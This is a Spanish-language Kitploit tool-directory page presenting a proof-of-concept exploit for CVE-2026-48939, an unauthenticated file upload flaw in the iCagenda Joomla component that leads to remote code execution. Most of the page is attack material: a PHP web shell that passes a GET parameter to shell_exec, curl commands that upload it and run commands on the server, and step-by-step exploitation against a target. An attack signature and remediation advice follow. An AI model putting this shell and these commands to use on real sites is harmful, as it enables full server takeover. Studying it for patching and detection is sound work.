Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-..CVE-2026-48939 — iCagenda Unauthenticated File Upload to RCE | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-..cve-2026-48939
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubpolosss/by-poloss..-..cve-2026-48939

By-Poloss..-..CVE-2026-48939

iCagenda Unauthenticated File Upload to RCE

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
11hace 1 mesAún no revisado

CVE-2026-48939 - iCagenda: Subida de archivos no autenticada a RCE

Resumen

CampoValor
ID de CVECVE-2026-48939
Puntuación CVSS 4.010.0 Crítico
Vector CVSSCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWECWE-284: Control de acceso inadecuado
Versiones afectadasiCagenda 3.2.1 - 3.9.14 y 4.0.0 - 4.0.7
Corregido eniCagenda 4.0.8 y 3.9.15
Publicado20 de junio de 2026

Descripción de la vulnerabilidad

iCagenda, un popular componente de eventos y calendario para Joomla, contiene una vulnerabilidad de subida de archivos no autenticada que permite a atacantes remotos subir y ejecutar código PHP arbitrario en sitios Joomla 6.

Detalles técnicos

La vulnerabilidad existe en la función de adjuntar archivos del formulario de envío de eventos del frontend:

  1. Falta de control de acceso: El endpoint de envío (index.php?option=com_icagenda&task=registration.submit) no aplica autenticación, omitiendo la configuración de acceso "Solo registrados".

  2. Sin validación de archivos: Los archivos subidos se guardan con su extensión original sin:

    • Validación de lista de permitidos de extensiones
    • Verificación del tipo MIME
    • Inspección del contenido del archivo
  3. Escritura directa de archivos: Los archivos se escriben en /images/icagenda/frontend/attachments/[nombre_del_archivo] directamente bajo la raíz web.

  4. Ejecución de PHP: En Joomla 6, los archivos .php subidos son ejecutables, lo que conduce a la ejecución remota de código (RCE).

Prueba de concepto

Método 1: Usando curl (comando único)

root@kitploit:~
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF

# Upload the shell
curl -k -s \
  -F "title=Test Event" \
  -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
  "https://poloss-jomola.ddev.site/icagenda_submit.php"

# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"

Método 2: Usando el script PoC

root@kitploit:~
# Navigate to project directory

# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site

Pasos de explotación

  1. Identificar el endpoint vulnerable:

    root@kitploit:~
    https://target.com/index.php?option=com_icagenda&task=submit
    
  2. Subir la web shell PHP:

    root@kitploit:~
    curl -X POST -F "jform[attachment][email protected]" \
      "https://target.com/index.php?option=com_icagenda&task=submit"
    
  3. Ejecutar la shell:

    root@kitploit:~
    curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
    

Impacto

  • Confidencialidad: Pérdida total de confidencialidad: el atacante puede leer todos los archivos
  • Integridad: Pérdida total de integridad: el atacante puede modificar todos los datos
  • Disponibilidad: Pérdida total de disponibilidad: el atacante puede denegar el servicio
  • Ejecución remota de código: Compromiso total del servidor

Firma del ataque

Según los registros de explotación reales, la firma del ataque es:

root@kitploit:~
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"

# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0

Remediación

  1. Inmediato: Actualizar iCagenda a la versión 4.0.8 (o 3.9.15 para la rama heredada)
  2. Alternativa: Eliminar o renombrar temporalmente las carpetas de com_icagenda
  3. Nota: Despublicar el componente NO protege contra esta vulnerabilidad

Referencias

  • iCagenda RCE de día cero - mysites.guru
  • Sitio oficial de iCagenda
  • Registro de cambios 4.0.8
  • Aviso ADP de CISA

Descargo de responsabilidad

Esta PoC es solo para fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.

Descargar herramienta